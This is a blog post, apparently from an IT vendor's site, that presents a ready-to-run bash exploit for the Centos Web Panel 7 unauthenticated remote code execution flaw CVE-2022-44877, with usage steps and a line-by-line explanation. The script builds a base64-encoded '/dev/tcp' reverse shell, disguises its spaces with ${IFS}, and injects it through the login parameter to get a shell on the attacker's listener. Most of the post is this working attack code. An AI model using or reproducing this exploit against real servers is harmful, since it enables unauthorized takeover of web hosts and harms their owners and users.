Skip to content

Unique exploit: CVE-2022–44877 Exploitation Tool

Here is the exploitation script of the Centos Web Panel 7 — CWP Unauthenticated RCE CVE-2022–44877

The script from here:

https://github.com/mhzcyber/CVE-Analysis/blob/main/CVE-2022%E2%80%9344877/CVE-2022-44877Exploit.sh

How to use the exploitation script:

Run listener:

Make the script executable:

chmod +x CVE-2022-44877Exploit.sh

Run the script:

./CVE-2022-44877Exploit.sh https://192.168.1.108:2031/ root 192.168.1.103 9001

Now we received a connection:

You can watch the exploitation script video here:

https://youtu.be/dtrwrCaE7d8

Code Explanation:

#!/bin/bash

function help {
echo "[-] USAGE: $0 Target_URL Target_username LHOST LPORT"
echo "[-] Example: $0 https://192.168.1.108:2031/ root 192.168.1.100 9001"
exit 1
}

function exploit {
target_url=$1
target_un=$2
lhost=$3
lport=$4

payload="sh -i >& /dev/tcp/${lhost}/${lport} 0>&1"
payload_base64=$(echo -n ${payload} | base64)

target_ip=$(egrep -o '([0-9]{1,3}[.]){3}[0-9]{1,3}' <<< ${target_url})

echo $target_ip

port=$(echo ${target_url} |  grep -oP ':\K\d+')

echo $port

curl -i -s -k -X $'POST' \
-H $'Host: '${target_ip}':'${port} \
-H $'Content-Type: application/x-www-form-urlencoded' \
--data-binary $'username='${target_un}'&password=test&commit=Login' \
-g ${target_url}'login/index.php?login=$(echo${IFS}'${payload_base64}'${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash)'

}

if [[ $# -eq 4 ]]; then
exploit "$1" "$2" "$3" "$4"
else
help
fi

This script has two main functions: help and exploit

The help function will be called if the user does not provide the correct number of arguments when running the script. It will display usage information and an example of how to run the script. 

The exploit function takes four arguments: the target URL, the target username, the local host IP address, and the local port number.

First, 

  • the script defines the payload, which is a command that creates a reverse shell. 
  • The payload is then encoded in base64. 
  • It then extracts the target IP address from the URL and port number,
  • and uses the curl command to send a HTTP post request to the target with the payload in the login= parameter. 
  • The payload is executed on the target server by base64 decoding the payload first and then running the command in bash.

#exploitation #tool #CVE-2022-44877

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About VRX
VRX is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.

×

Hello!

Click one of our contacts below to chat on WhatsApp

Social Chat is free, download and try it now here!

×